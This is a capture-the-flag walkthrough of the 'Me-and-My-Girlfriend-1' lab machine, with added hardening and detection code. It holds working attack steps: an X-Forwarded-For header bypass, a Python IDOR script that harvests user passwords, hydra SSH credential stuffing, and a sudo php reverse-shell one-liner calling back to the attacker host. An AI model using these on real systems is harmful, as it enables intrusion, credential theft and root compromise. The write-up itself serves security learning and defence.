Me-and-My-Girlfriend-1
阿新 • Published: 2022-03-10
1 Information gathering
1.1 Port scan
┌──(kali㉿kali)-[~]
└─$ nmap -sV -T4 -p - 192.168.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-07 19:54 CST
Nmap scan report for 192.168.0.3
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1.2 Directory scan
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.0.3/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[20:43:35] Starting:
[20:43:35] 301 -  308B - /misc -> http://192.168.0.3/misc/
[20:43:38] 301 -  310B - /config -> http://192.168.0.3/config/
[20:56:50] 200 -  120B - /index.php
[20:56:58] 200 -   32B - /robots.txt
[20:47:35] 403 -  291B - /server-status
Task Completed
1.2.1 Directory analysis
- Visiting http://192.168.0.3/ shows an IP restriction; the page source reveals that it can be bypassed with the X-Forwarded-For header.
- Install the Firefox extension "X-Forwarded-For Header", set the IP address to 127.0.0.1 and select X-Forwarded-For as the request header.
- With the X-Forwarded-For Header extension the target site loads: http://192.168.0.3/?page=index
- Register a user named test on the target site.
- After logging in, the dashboard is reachable: http://192.168.0.3/index.php?page=dashboard
- At http://192.168.0.3/index.php?page=profile&user_id=12, change user_id=12 to user_id=1.
  # Horizontal privilege escalation (IDOR): the profile of another registered user is returned: Eweuh Tandingan eweuhtandingan skuyatuh
- Write a script that tries to collect every user's account name and password:
import requests, re

def extract_field(html, field_id):
    # Pull the value attribute of the given form field; return None instead of
    # raising when the profile page has no such field (e.g. a non-existent user_id).
    m = re.search('id="%s" value="(.*?)">' % field_id, html)
    return m.group(1) if m else None

def get_user_pass(uid):
    t_url = 'http://192.168.0.3/index.php?page=profile&user_id=%s' % uid
    # session cookie of the registered "test" user
    t_cookie = {"PHPSESSID": "ua2kg2n1inkvdbdcohitotsgg5"}
    # header that bypasses the IP restriction
    t_headers = {"X-Forwarded-For": "127.0.0.1"}
    getreq = requests.get(url=t_url, cookies=t_cookie, headers=t_headers).text
    # match name
    getname = extract_field(getreq, "name")
    # match username
    getusername = extract_field(getreq, "username")
    # match passwd
    getpasswd = extract_field(getreq, "password")
    return getname, getusername, getpasswd

if __name__ == '__main__':
    for i in range(20):
        getname, getusername, getpasswd = get_user_pass(i)
        if getname:
            print("%s:%s" % (getusername, getpasswd))
- Result:
  eweuhtandingan:skuyatuh
  aingmaung:qwerty!!!
  sundatea:indONEsia
  sedihaingmah:cedihhihihi
  alice:4lic3
  abdikasepak:dorrrrr
  test:Admin123
- http://192.168.0.3/robots.txt
- http://192.168.0.3/heyhoo.txt
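The two server-side weaknesses used in this section are an IP allow-list that trusts the client-supplied X-Forwarded-For header, and a profile page that returns whichever user_id is requested (including the stored password). The following is an added example written for this page, not the target application's PHP code: each weakness is shown beside a hardened version. The Request model, the user table, the hash placeholders and the trusted-proxy address 10.0.0.5 are assumptions.

```python
"""Added example (not the original application's code): the two defects the
write-up exploits, each next to a hardened form.

  1. The IP allow-list trusts the client-supplied X-Forwarded-For header.
  2. The profile page serves any user_id's record, password included.

Request, USERS and TRUSTED_PROXIES are hypothetical stand-ins."""
from dataclasses import dataclass, field
from typing import Dict, Optional

ALLOWED_CLIENT_IPS = {"127.0.0.1"}
# Assumed deployment: only this reverse proxy is allowed to set X-Forwarded-For.
TRUSTED_PROXIES = {"10.0.0.5"}


@dataclass
class Request:
    remote_addr: str                                   # TCP peer address
    headers: Dict[str, str] = field(default_factory=dict)
    session_user_id: Optional[int] = None              # authenticated user
    query: Dict[str, str] = field(default_factory=dict)


# Constructed user table; passwords are stored as opaque hashes, never plaintext.
USERS = {
    1: {"name": "Eweuh Tandingan", "username": "eweuhtandingan", "pw_hash": "<hash-1>"},
    12: {"name": "Test", "username": "test", "pw_hash": "<hash-12>"},
}


def client_ip_vulnerable(req: Request) -> str:
    """Believes whatever the client wrote into X-Forwarded-For."""
    return req.headers.get("X-Forwarded-For", req.remote_addr)


def client_ip_hardened(req: Request) -> str:
    """Honours X-Forwarded-For only when the TCP peer is a trusted proxy, and
    then uses the last hop (the one that proxy appended); anything further
    left was supplied by the client and is untrusted."""
    if req.remote_addr in TRUSTED_PROXIES:
        hops = [h.strip() for h in req.headers.get("X-Forwarded-For", "").split(",") if h.strip()]
        if hops:
            return hops[-1]
    return req.remote_addr


def ip_allowed(req: Request, resolver=client_ip_hardened) -> bool:
    return resolver(req) in ALLOWED_CLIENT_IPS


def _requested_user_id(req: Request) -> Optional[int]:
    try:
        return int(req.query.get("user_id", ""))
    except ValueError:
        return None


def profile_vulnerable(req: Request) -> Optional[dict]:
    """Looks up the record for any user_id the caller names (IDOR)."""
    return USERS.get(_requested_user_id(req))


def profile_hardened(req: Request) -> Optional[dict]:
    """Object-level authorization: a session may only read its own record,
    and the password hash never leaves the server."""
    if req.session_user_id is None:
        return None
    uid = _requested_user_id(req)
    if uid != req.session_user_id:
        return None  # deny; a uid/session mismatch is worth logging as probing
    rec = USERS.get(uid)
    if rec is None:
        return None
    return {k: v for k, v in rec.items() if k != "pw_hash"}
```

With the spoofed header the vulnerable resolver reports 127.0.0.1 and passes the allow-list, while the hardened one reports the real peer address and denies; likewise, a session for user 12 asking for user_id=1 gets the record from profile_vulnerable and nothing from profile_hardened.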
2 GetShell
2.1 Use the collected credentials to try SSH logins to the target host
# hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -C user-pass ssh://192.168.0.3
# Result: a working SSH username and password
alice:4lic3
- -C FILE: the file holds one "login:pass" pair per line
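What the credential-list run above looks like from the defender's side: an added example, not part of the write-up, that parses sshd lines from auth.log and flags a burst of failed passwords from one source followed by a successful login from the same source. The log excerpt is constructed to resemble Ubuntu's sshd syslog format, and the 60-second window and three-failure threshold are assumptions to tune per environment.

```python
"""Added example (not from the write-up): detect a credential list being
tried against sshd by reading auth.log. Log lines below are constructed."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed excerpt: several pairs fail from 192.168.0.2, then one succeeds.
# A single typo and retry from 192.168.0.7 is included as benign contrast.
SAMPLE_AUTH_LOG = """
Mar  7 20:10:01 gfriEND sshd[2211]: Failed password for eweuhtandingan from 192.168.0.2 port 51002 ssh2
Mar  7 20:10:01 gfriEND sshd[2213]: Failed password for aingmaung from 192.168.0.2 port 51004 ssh2
Mar  7 20:10:02 gfriEND sshd[2215]: Failed password for sundatea from 192.168.0.2 port 51006 ssh2
Mar  7 20:10:02 gfriEND sshd[2217]: Failed password for invalid user sedihaingmah from 192.168.0.2 port 51008 ssh2
Mar  7 20:10:02 gfriEND sshd[2219]: Accepted password for alice from 192.168.0.2 port 51010 ssh2
Mar  7 20:15:30 gfriEND sshd[2301]: Failed password for alice from 192.168.0.7 port 40022 ssh2
Mar  7 20:16:40 gfriEND sshd[2305]: Accepted password for alice from 192.168.0.7 port 40024 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_auth_log(text, year=2022):
    """Turn sshd password-auth lines into (time, source ip, user, success)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog pads the day with spaces; collapse them before parsing
        stamp = " ".join(m["ts"].split())
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def detect_bruteforce(events, window_s=60, threshold=3):
    """Per source IP, keep the failures of the last window_s seconds.
    Emit 'burst' when they reach the threshold and 'success_after_burst' when
    a login succeeds while the window still holds that many failures: the
    signature of a credential list that eventually hit."""
    alerts = []
    recent = defaultdict(list)  # ip -> [(ts, user), ...] failures inside the window
    # stable sort by time keeps the original order of same-second lines
    for ts, ip, user, ok in sorted(events, key=lambda e: e[0]):
        recent[ip] = [(t, u) for t, u in recent[ip] if (ts - t).total_seconds() <= window_s]
        if ok:
            if len(recent[ip]) >= threshold:
                alerts.append({"kind": "success_after_burst", "ip": ip, "user": user,
                               "failures": len(recent[ip]),
                               "tried": sorted({u for _, u in recent[ip]})})
            recent[ip] = []
            continue
        recent[ip].append((ts, user))
        if len(recent[ip]) == threshold:
            alerts.append({"kind": "burst", "ip": ip, "failures": threshold,
                           "tried": sorted({u for _, u in recent[ip]})})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(alert)
```

The "success after burst" case is the one worth paging on: a source that cycled through several accounts and then logged in as alice is a likely account compromise rather than a forgotten password.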
2.2 Login succeeds
# Read the first flag
alice@gfriEND:~$ cat .my_secret/flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
3 Privilege escalation
3.1 First attempt
sudo su -
Privilege escalation fails.
3.2 Gather information about the current system
- Check /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
alice:x:1000:1001:Alice Geulis,1337,+62,+62:/home/alice:/bin/bash
eweuhtandingan:x:1001:1002:,,,:/home/eweuhtandingan:/bin/bash
aingmaung:x:1002:1003:,,,:/home/aingmaung:/bin/bash
sundatea:x:1003:1004:,,,:/home/sundatea:/bin/bash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false
- SUID binaries: nothing usable
alice@gfriEND:~$ find / -perm -u=s 2>/dev/null
/bin/ping6
/bin/ping
/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mtr
/usr/bin/pkexec
/usr/bin/at
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/sudo
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
- Files owned by the local users: nothing of interest
alice@gfriEND:~$ find / -user 1000 2>/dev/null
/home/alice
/home/alice/.bashrc
/home/alice/.cache
/home/alice/.cache/motd.legal-displayed
/home/alice/.bash_logout
/home/alice/.bash_history
/home/alice/.profile
/home/alice/.my_secret
/home/alice/.my_secret/my_notes.txt
alice@gfriEND:~$ find / -user 1001 2>/dev/null
/home/eweuhtandingan
/home/eweuhtandingan/.bashrc
/home/eweuhtandingan/.bash_logout
/home/eweuhtandingan/.profile
alice@gfriEND:~$ find / -user 1002 2>/dev/null
/home/aingmaung
/home/aingmaung/.bashrc
/home/aingmaung/.bash_logout
/home/aingmaung/.profile
alice@gfriEND:~$ find / -user 1003 2>/dev/null
/home/sundatea
/home/sundatea/.bashrc
/home/sundatea/.bash_logout
/home/sundatea/.profile
alice@gfriEND:~$
- Look for sensitive files: the web application's config stores the MySQL root credentials in plaintext
alice@gfriEND:/var/www/html$ cat config/config.php
<?php
$conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
alice@gfriEND:/var/www/html$
- Check whether the alice user has any sudo privileges
alice@gfriEND:~$ sudo -l
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php
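A sudo rule that runs an interpreter as root without a password is equivalent to granting root outright, which is what the next step relies on. The following is an added example, not from the write-up, that parses sudo -l output and flags rules allowing a shell-capable program (or ALL) as root, with NOPASSWD noted separately. The sample reuses the entry above and adds a benign apt-get rule for contrast; that second rule and the list of shell-capable binaries are assumptions, and the list is a starting point rather than a complete inventory.

```python
"""Added example (not from the write-up): audit `sudo -l` output for rules
that amount to a root shell. SHELL_CAPABLE is an assumed starting list."""
import os
import re

# Constructed sample: the write-up's rule plus one benign entry for contrast.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php
    (root) /usr/bin/apt-get update
"""

# One "(runas) TAG: command, command" line as printed by sudo -l.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

# Programs that can execute arbitrary code or spawn a shell (assumed, partial list).
SHELL_CAPABLE = {"php", "python", "perl", "ruby", "node", "bash", "sh", "dash", "zsh"}


def _runs_as_root(runas: str) -> bool:
    tokens = re.split(r"[\s:,]+", runas.strip())
    return any(t in ("root", "ALL") for t in tokens)


def _program_name(path: str) -> str:
    # /usr/bin/python3.4 -> python, /usr/bin/php5 -> php
    return re.sub(r"[\d.]+$", "", os.path.basename(path))


def audit_sudo_l(text: str):
    """Return one finding per risky command; benign rules produce nothing."""
    findings = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        nopasswd = "NOPASSWD" in tags
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if not cmd:
                continue
            prog = cmd.split()[0]
            reasons = []
            if cmd == "ALL":
                reasons.append("any command")
            elif _program_name(prog) in SHELL_CAPABLE:
                reasons.append("interpreter or shell that can run arbitrary code")
            elif "*" in prog:
                reasons.append("wildcard in command path")
            if not reasons:
                continue
            if nopasswd:
                reasons.append("NOPASSWD: no credential prompt before use")
            findings.append({
                "runas": m["runas"].strip(),
                "command": cmd,
                "as_root": _runs_as_root(m["runas"]),
                "nopasswd": nopasswd,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f)
```

Run it against `sudo -l -U <user>` output collected by a configuration-review job; the fix for a hit like the one above is to restrict the rule to the specific script that needs root (without wildcards) or to move the task to a dedicated service account.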
3.3 Privilege escalation via sudo php
alice@gfriEND:~$ sudo php -r '$sock=fsockopen("192.168.0.2",2333);exec("/bin/bash -i <&3 >&3 2>&3");'
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2333
listening on [any] 2333 ...
connect to [192.168.0.2] from (UNKNOWN) [192.168.0.3] 57734
root@gfriEND:~# cat flag2.txt
________ __ ___________.__ ___________.__ ._.
/ _____/ _____/ |_ \__ ___/| |__ ____ \_ _____/| | _____ ____| |
/ \ ___ / _ \ __\ | | | | \_/ __ \ | __) | | \__ \ / ___\ |
\ \_\ ( <_> ) | | | | Y \ ___/ | \ | |__/ __ \_/ /_/ >|
\______ /\____/|__| |____| |___| /\___ > \___ / |____(____ /\___ /__
\/ \/ \/ \/ \//_____/ \/
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:/root#